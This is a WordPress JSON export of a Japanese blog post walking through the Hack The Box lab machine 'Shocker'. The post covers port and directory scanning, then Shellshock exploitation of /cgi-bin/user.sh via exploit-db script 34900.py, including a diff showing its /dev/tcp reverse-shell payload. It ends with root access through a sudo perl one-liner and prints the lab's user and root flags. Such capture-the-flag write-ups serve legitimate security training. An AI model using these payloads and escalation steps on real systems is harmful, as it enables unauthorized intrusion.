{"id":3740,"date":"2020-08-16T17:25:46","date_gmt":"2020-08-16T08:25:46","guid":{"rendered":"https:\/\/tech.akat.info\/?p=3740"},"modified":"2020-08-30T23:33:15","modified_gmt":"2020-08-30T14:33:15","slug":"hack-the-box-shocker-walkthrough","status":"publish","type":"post","link":"https:\/\/tech.akat.info\/?p=3740","title":{"rendered":"Hack The Box &#8211; Shocker &#8211; Walkthrough"},"content":{"rendered":"<h3>SMB\u304c\u516c\u958b\u3055\u308c\u3066\u3044\u308b<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# nmap -A -n -F -T5 shocker.htb\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-16 03:23 UTC\r\nNmap scan report for shocker.htb (10.10.10.56)\r\nHost is up (0.045s latency).\r\nNot shown: 99 filtered ports\r\nPORT   STATE SERVICE VERSION\r\n80\/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))\r\n|_http-server-header: Apache\/2.4.18 (Ubuntu)\r\n|_http-title: Site doesn't have a title (text\/html).\r\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\r\nDevice type: print server|printer|general purpose|VoIP phone|broadband router\r\nRunning (JUST GUESSING): HP embedded (90%), IBM AIX 4.X (86%), Tadiran embedded (85%), Wind River VxWorks 5.X (85%), Motorola embedded (85%), Microsoft Windows 2003|XP (85%)\r\nOS CPE: cpe:\/h:hp:jetdirect_170x cpe:\/h:hp:inkjet_3000 cpe:\/o:ibm:aix:4.3 cpe:\/h:tadiran:flexset-ip_280s cpe:\/o:windriver:vxworks:5.4 cpe:\/h:motorola:surfboard_sbv5121 cpe:\/o:microsoft:windows_server_2003::sp2 cpe:\/o:microsoft:windows_xp\r\nAggressive OS guesses: HP 170X print server or Inkjet 3000 printer (90%), HP LaserJet 4250 printer (87%), IBM AIX 4.3 (86%), Tadiran FlexSet-IP 280S VoIP phone (85%), Motorola SURFboard SBV5121 broadband router (VxWorks 5.4) (85%), Microsoft Windows Server 2003 SP2 (85%), Microsoft Windows XP (85%), Microsoft Windows XP SP3 (85%)\r\nNo exact OS matches for host (test conditions non-ideal).\r\nNetwork Distance: 2 hops\r\n<\/pre>\n<h3>80\u756a\u30dd\u30fc\u30c8\u306b\u30a2\u30af\u30bb\u30b9\u3057\u3066\u307f\u308b<\/h3>\n<p><a href=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-16_122950.png\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-16_122950-288x300.png\" alt=\"\" width=\"288\" height=\"300\" class=\"alignnone size-medium wp-image-3741\" srcset=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-16_122950-288x300.png 288w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-16_122950-768x799.png 768w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-16_122950.png 974w\" sizes=\"(max-width: 288px) 100vw, 288px\" \/><\/a><br \/>\ngobuster\u3067\u306f\u30d5\u30a9\u30eb\u30c0\u3092\u898b\u3064\u3051\u3089\u308c\u306a\u304b\u3063\u305f\u3002<\/p>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# gobuster dir -u http:\/\/shocker.htb -w \/usr\/share\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt\r\n===============================================================\r\nGobuster v3.0.1\r\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@_FireFart_)\r\n===============================================================\r\n&#x5B;+] Url:            http:\/\/shocker.htb\r\n&#x5B;+] Threads:        10\r\n&#x5B;+] Wordlist:       \/usr\/share\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt\r\n&#x5B;+] Status codes:   200,204,301,302,307,401,403\r\n&#x5B;+] User Agent:     gobuster\/3.0.1\r\n&#x5B;+] Timeout:        10s\r\n===============================================================\r\n2020\/08\/16 03:30:41 Starting gobuster\r\n===============================================================\r\nProgress: 65661 \/ 220561 (29.77%)\r\n<\/pre>\n<p>dirb\u3092\u5229\u7528\u3057\u3066\u3001\/cgi-bin\/user.sh\u304c\u3042\u308b\u3053\u3068\u304c\u308f\u304b\u308b\u3002<\/p>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# dirb http:\/\/shocker.htb\/\r\n\r\n-----------------\r\nDIRB v2.22\r\nBy The Dark Raver\r\n-----------------\r\n\r\nSTART_TIME: Sun Aug 16 07:39:22 2020\r\nURL_BASE: http:\/\/shocker.htb\/\r\nWORDLIST_FILES: \/usr\/share\/dirb\/wordlists\/common.txt\r\n\r\n-----------------\r\n\r\nGENERATED WORDS: 4612\r\n\r\n---- Scanning URL: http:\/\/shocker.htb\/ ----\r\n+ http:\/\/shocker.htb\/cgi-bin\/ (CODE:403|SIZE:294)\r\n+ http:\/\/shocker.htb\/index.html (CODE:200|SIZE:137)\r\n+ http:\/\/shocker.htb\/server-status (CODE:403|SIZE:299)\r\n\r\n-----------------\r\nEND_TIME: Sun Aug 16 07:57:47 2020\r\nDOWNLOADED: 4612 - FOUND: 3\r\n\r\n# dirb http:\/\/shocker.htb\/cgi-bin\/ -w \/usr\/share\/dirb\/common.txt -X .sh\r\n\r\n-----------------\r\nDIRB v2.22\r\nBy The Dark Raver\r\n-----------------\r\n\r\nSTART_TIME: Sun Aug 16 08:01:30 2020\r\nURL_BASE: http:\/\/shocker.htb\/cgi-bin\/\r\nWORDLIST_FILES: \/usr\/share\/dirb\/wordlists\/common.txt\r\nOPTION: Not Stopping on warning messages\r\nEXTENSIONS_LIST: (.sh) | (.sh) &#x5B;NUM = 1]\r\n\r\n-----------------\r\n\r\nGENERATED WORDS: 4612\r\n\r\n---- Scanning URL: http:\/\/shocker.htb\/cgi-bin\/ ----\r\n+ http:\/\/shocker.htb\/cgi-bin\/user.sh (CODE:200|SIZE:118)\r\n\r\n-----------------\r\nEND_TIME: Sun Aug 16 08:20:29 2020\r\nDOWNLOADED: 4612 - FOUND: 1\r\n<\/pre>\n<h3>\u30de\u30b7\u30f3\u540d\u7684\u306bShellShock\u3092\u8a66\u3057\u3066\u307f\u308b<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# searchsploit shellshock\r\n--------------------------------------------------------------------------------------------------------------- ---------------------------------\r\n Exploit Title                                                                                                 |  Path\r\n--------------------------------------------------------------------------------------------------------------- ---------------------------------\r\nAdvantech Switch - 'Shellshock' Bash Environment Variable Command Injection (Metasploit)                       | cgi\/remote\/38849.rb\r\nApache mod_cgi - 'Shellshock' Remote Command Injection                                                         | linux\/remote\/34900.py\r\nBash - 'Shellshock' Environment Variables Command Injection                                                    | linux\/remote\/34766.php\r\nBash CGI - 'Shellshock' Remote Command Injection (Metasploit)                                                  | cgi\/webapps\/34895.rb\r\nCisco UCS Manager 2.1(1b) - Remote Command Injection (Shellshock)                                              | hardware\/remote\/39568.py\r\ndhclient 4.1 - Bash Environment Variable Command Injection (Shellshock)                                        | linux\/remote\/36933.py\r\nGNU Bash - 'Shellshock' Environment Variable Command Injection                                                 | linux\/remote\/34765.txt\r\nIPFire - 'Shellshock' Bash Environment Variable Command Injection (Metasploit)                                 | cgi\/remote\/39918.rb\r\nNUUO NVRmini 2 3.0.8 - Remote Command Injection (Shellshock)                                                   | cgi\/webapps\/40213.txt\r\nOpenVPN 2.2.29 - 'Shellshock' Remote Command Injection                                                         | linux\/remote\/34879.txt\r\nPHP &lt; 5.6.2 - 'Shellshock' Safe Mode \/ disable_functions Bypass \/ Command Injection                            | php\/webapps\/35146.txt\r\nPostfix SMTP 4.2.x &lt; 4.2.48 - 'Shellshock' Remote Command Injection                                            | linux\/remote\/34896.py\r\nRedStar 3.0 Server - 'Shellshock' 'BEAM' \/ 'RSSMON' Command Injection                                          | linux\/local\/40938.py\r\nSun Secure Global Desktop and Oracle Global Desktop 4.61.915 - Command Injection (Shellshock)                  | cgi\/webapps\/39887.txt\r\nTrendMicro InterScan Web Security Virtual Appliance - 'Shellshock' Remote Command Injection                    | hardware\/remote\/40619.py\r\n--------------------------------------------------------------------------------------------------------------- ---------------------------------\r\nShellcodes: No Results\r\n\r\n# searchsploit -m linux\/remote\/34900.py\r\n\r\n# sed -i 's\/\\r\/\/' 34900.py\r\n\r\n# python 34900.py payload=reverse rhost=10.10.10.56 lhost=172.17.0.2 lport=4444 pages=\/cgi-bin\/user.sh\r\n&#x5B;!] Started reverse shell handler\r\n&#x5B;-] Trying exploit on : \/cgi-bin\/user.sh\r\n&#x5B;!] Successfully exploited\r\n&#x5B;!] Incoming connection from 172.17.0.1\r\n172.17.0.1&gt; id\r\nuid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)\r\n\r\n172.17.0.1&gt; pwd\r\n\/usr\/lib\/cgi-bin\r\n\r\n172.17.0.1&gt; cat \/home\/shelly\/user.txt\r\n2ec24e11320026d1e70ff3e16695b233\r\n\r\n172.17.0.1&gt; sudo -l\r\nMatching Defaults entries for shelly on Shocker:\r\n    env_reset, mail_badpass,\r\n    secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\r\n\r\nUser shelly may run the following commands on Shocker:\r\n    (root) NOPASSWD: \/usr\/bin\/perl\r\n\r\n172.17.0.1&gt; sudo \/usr\/bin\/perl -e 'exec &quot;\/bin\/bash&quot;;'\r\n172.17.0.1&gt; id\r\nuid=0(root) gid=0(root) groups=0(root)\r\n\r\n172.17.0.1&gt; cat \/root\/root.txt\r\n52c2715605d70c7619030560dc1ca467\r\n<\/pre>\n<p>KaliLinux\u3092Docker\u3067\u52d5\u4f5c\u3055\u305b\u3066\u3044\u308b\u305f\u3081\u300134900.py\u3092\u4e00\u90e8\u4fee\u6b63\u3057\u3066\u3044\u308b\u3002<\/p>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# diff 34900.py \/usr\/share\/exploitdb\/exploits\/linux\/remote\/34900.py\r\n76c76\r\n&lt;               payload = &quot;() { :;}; \/bin\/bash -c \/bin\/bash -i &gt;&amp; \/dev\/tcp\/10.10.14.7\/&quot;+str(lport)+&quot; 0&gt;&amp;1 &amp;&quot;\r\n---\r\n&gt;               payload = &quot;() { :;}; \/bin\/bash -c \/bin\/bash -i &gt;&amp; \/dev\/tcp\/&quot;+lhost+&quot;\/&quot;+str(lport)+&quot; 0&gt;&amp;1 &amp;&quot;\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>SMB\u304c\u516c\u958b\u3055\u308c\u3066\u3044\u308b # nmap -A -n -F -T5 shocker.htb Starting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-16 03:23 UTC Nm [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[100,98],"tags":[],"_links":{"self":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3740"}],"collection":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3740"}],"version-history":[{"count":2,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3740\/revisions"}],"predecessor-version":[{"id":3783,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3740\/revisions\/3783"}],"wp:attachment":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3740"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3740"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3740"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}